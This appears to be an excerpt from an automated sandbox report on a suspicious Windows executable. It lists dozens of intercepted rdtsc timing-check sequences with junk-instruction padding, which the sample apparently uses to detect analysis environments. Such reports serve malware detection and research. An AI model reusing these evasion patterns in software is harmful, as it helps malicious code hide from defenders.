                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED9D34 second address: ED9D3E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3F156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: ED9D3E second address: ED9D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EDF19E second address: EDF1B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F4BA0D3F158h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E08CF1 second address: E08CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EE8867 second address: EE8882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3F15Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F4BA0D3F156h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EE8882 second address: EE8886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EEF95D second address: EEF964 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EEE31B second address: EEE325 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4BA0D3970Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: EF4081 second address: EF408C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F4BA0D3F156h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F00124 second address: F00134 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4BA0D39706h 0x00000008 jo 00007F4BA0D39706h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F00134 second address: F0016E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jmp 00007F4BA0D3F165h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4BA0D3F166h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F0D65B second address: F0D65F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F2549A second address: F254A4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4BA0D3F172h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F24524 second address: F24536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F24679 second address: F24681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F2493F second address: F24945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F24945 second address: F24949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F24D77 second address: F24D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39716h 0x0000000d jng 00007F4BA0D39706h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F24EC3 second address: F24EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F4BA0D3F166h 0x0000000f pop eax 0x00000010 jc 00007F4BA0D3F15Eh 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 je 00007F4BA0D3F156h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jp 00007F4BA0D3F156h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F24EFE second address: F24F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jne 00007F4BA0D3970Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F2519E second address: F251A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F251A2 second address: F251C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39716h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F4BA0D39706h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F26B57 second address: F26B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F26B5D second address: F26B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Bh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F28388 second address: F2838E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F2823A second address: F28240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F2ABD3 second address: F2ABD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: F2C4BD second address: F2C4F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39716h 0x00000007 jmp 00007F4BA0D39717h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F4BA0D39706h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: E50EC5 second address: E50EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53702BC second address: 53702D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39711h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53702D1 second address: 53702EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53702EF second address: 53702F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53702F5 second address: 5370338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4BA0D3F167h 0x00000009 sbb cl, 0000000Eh 0x0000000c jmp 00007F4BA0D3F169h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a mov bx, si 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370338 second address: 5370374 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 66419DA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4BA0D39712h 0x0000000f add ch, FFFFFFB8h 0x00000012 jmp 00007F4BA0D3970Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov edx, dword ptr [ebp+0Ch] 0x0000001c pushad 0x0000001d pushad 0x0000001e mov dh, cl 0x00000020 push edi 0x00000021 pop eax 0x00000022 popad 0x00000023 pushad 0x00000024 mov ax, dx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53906A1 second address: 53906B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53906B0 second address: 53906DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov bl, cl 0x0000000d mov di, 59FCh 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53906DC second address: 5390706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4BA0D3F15Dh 0x0000000a and si, A556h 0x0000000f jmp 00007F4BA0D3F161h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390706 second address: 539076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39717h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e jmp 00007F4BA0D39712h 0x00000013 xchg eax, esi 0x00000014 jmp 00007F4BA0D39710h 0x00000019 push eax 0x0000001a jmp 00007F4BA0D3970Bh 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4BA0D39715h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 539076D second address: 53907CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4BA0D3F15Ch 0x00000013 add si, D5C8h 0x00000018 jmp 00007F4BA0D3F15Bh 0x0000001d popfd 0x0000001e mov di, si 0x00000021 popad 0x00000022 nop 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F4BA0D3F15Eh 0x0000002c sub cx, D828h 0x00000031 jmp 00007F4BA0D3F15Bh 0x00000036 popfd 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53907CC second address: 5390814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4BA0D39712h 0x0000000f sbb cx, A5B8h 0x00000014 jmp 00007F4BA0D3970Bh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390814 second address: 5390826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390826 second address: 5390849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F4BA0D3970Bh 0x00000012 pop eax 0x00000013 movsx ebx, ax 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390849 second address: 539085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53908BC second address: 53908C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53908C0 second address: 53908D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53908D9 second address: 53908DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53908DF second address: 53908E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 539097D second address: 5390987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 44FADD78h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5390987 second address: 538002B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b mov ax, 42FDh 0x0000000f pushfd 0x00000010 jmp 00007F4BA0D3F15Ah 0x00000015 or ch, FFFFFFD8h 0x00000018 jmp 00007F4BA0D3F15Bh 0x0000001d popfd 0x0000001e popad 0x0000001f retn 0004h 0x00000022 nop 0x00000023 cmp eax, 00000000h 0x00000026 setne al 0x00000029 jmp 00007F4BA0D3F152h 0x0000002b xor ebx, ebx 0x0000002d test al, 01h 0x0000002f jne 00007F4BA0D3F157h 0x00000031 sub esp, 04h 0x00000034 mov dword ptr [esp], 0000000Dh 0x0000003b call 00007F4BA543C74Bh 0x00000040 mov edi, edi 0x00000042 jmp 00007F4BA0D3F15Dh 0x00000047 xchg eax, ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b call 00007F4BA0D3F163h 0x00000050 pop ecx 0x00000051 movsx edi, ax 0x00000054 popad 0x00000055 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 538002B second address: 538007B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, DA3Ah 0x00000011 mov edi, 5DC06006h 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4BA0D39719h 0x00000020 and cl, 00000066h 0x00000023 jmp 00007F4BA0D39711h 0x00000028 popfd 0x00000029 push esi 0x0000002a pop edi 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e mov ebx, esi 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 538007B second address: 53800BF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4BA0D3F166h 0x00000008 sbb eax, 60E36C38h 0x0000000e jmp 00007F4BA0D3F15Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4BA0D3F160h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53800BF second address: 53800C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53800C5 second address: 53800CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53800CB second address: 5380125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f movsx ebx, cx 0x00000012 popad 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 mov edi, eax 0x00000017 jmp 00007F4BA0D39710h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushad 0x00000020 call 00007F4BA0D39717h 0x00000025 pop esi 0x00000026 mov dh, D0h 0x00000028 popad 0x00000029 mov ax, 2C21h 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 movzx esi, dx 0x00000033 mov bl, 7Ah 0x00000035 popad 0x00000036 xchg eax, edi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380125 second address: 5380129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380129 second address: 538013C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 538013C second address: 5380154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F164h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380154 second address: 5380158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53801AE second address: 53801CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53801CB second address: 53801D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53801D1 second address: 53801D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53801D5 second address: 5380205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39713h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub edi, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ecx, 4A08ED47h 0x00000015 jmp 00007F4BA0D3970Ch 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380205 second address: 5380252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 jmp 00007F4BA0D3F168h 0x00000017 popad 0x00000018 popad 0x00000019 test al, al 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4BA0D3F167h 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380252 second address: 5380258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380258 second address: 538025C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 538025C second address: 5380276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F4BA0D398AAh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4BA0D3970Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380276 second address: 53802A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c jmp 00007F4BA0D3F166h 0x00000011 mov dword ptr [ebp-14h], edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53802A7 second address: 53802AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53802AB second address: 53802C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 538039B second address: 53803A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53803A1 second address: 53803B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53803B4 second address: 5380484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F4BA0D3973Bh 0x00000011 jmp 00007F4BA0D3970Eh 0x00000016 cmp dword ptr [ebp-14h], edi 0x00000019 pushad 0x0000001a mov ax, 19FDh 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 jne 00007F4C11A577AEh 0x00000028 jmp 00007F4BA0D39715h 0x0000002d mov ebx, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 movzx esi, bx 0x00000034 pushfd 0x00000035 jmp 00007F4BA0D39719h 0x0000003a adc cx, 7D26h 0x0000003f jmp 00007F4BA0D39711h 0x00000044 popfd 0x00000045 popad 0x00000046 lea eax, dword ptr [ebp-2Ch] 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007F4BA0D39713h 0x00000052 or cl, 0000005Eh 0x00000055 jmp 00007F4BA0D39719h 0x0000005a popfd 0x0000005b mov eax, 622CF927h 0x00000060 popad 0x00000061 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5380484 second address: 538048A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 538048A second address: 538048E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 538048E second address: 53804C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F4BA0D3F166h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53804C0 second address: 53804CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53804CF second address: 53804E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 53804E1 second address: 53804E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370E23 second address: 5370E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370E27 second address: 5370E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\jSFUzuYPG9.exeRDTSC instruction interceptor: First address: 5370E2D second address: 5370E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
